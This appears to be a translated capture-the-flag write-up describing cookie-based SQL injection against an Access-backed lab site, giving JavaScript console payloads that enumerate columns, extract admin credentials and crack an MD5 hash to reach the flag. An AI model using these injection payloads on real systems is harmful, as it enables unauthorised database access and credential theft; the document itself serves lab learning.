Acess injection-Cookie injection
Shooting range address
Principle: $_REQUEST[] in php can get POST|GET|COOKIE parameters, you can use burp to capture packets to modify the parameters of the cookie, or you can use the console to use JS for cookie injection
first question:
We go into the shooting range and click a link to enter the interface with id transfer parameters.
Let’s try first to see if we can perform GET parameter transfer for error injection. We found that it was forbidden, so we tried cookie injection. Open burp to capture the packet and remove the id=171 above. Add; after the cookie; close, and then enter id=171, and see Whether the statement is executed and then put the package, I found that there is no id parameter, but the page returns to the normal representative. The statement I entered was successfully executed , so I use JS to determine the number of fields in the console
document.cookie="id="+escape("171 order by 1")
The page is normal, we continue to enlarge, to 11
document.cookie="id="+escape("171 order by 11")
Error, we enter 10
document.cookie="id="+escape("171 order by 10")
The page is normal, so we determine that there are 10 fields, continue to enter the JS statement
document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")
Because the access database has only one library name, you need to write from admin to find the output bits 2, 3, 7, 8, 9 of the database to
determine the table name. We can use the method of guessing and manually blast
but it is more suitable for novices We used burp to blast, so we
captured the packet and found
many possible table names, but generally in the era when Access databases were popular, they were all in the username and password fields of the admin table,
so we entered directly
document.cookie="id="+escape("171 union select 1,username,3,4,5,6,7,8,9,10 from admin")
Find the account admin and
continue typing
document.cookie="id="+escape("171 union select 1,password,3,4,5,6,7,8,9,10 from admin")
Find the password
b9a2a2b5dffb918c
login in the background
but the password is wrong
Decrypt the password md5
to get the flag: zkz{welcome-control}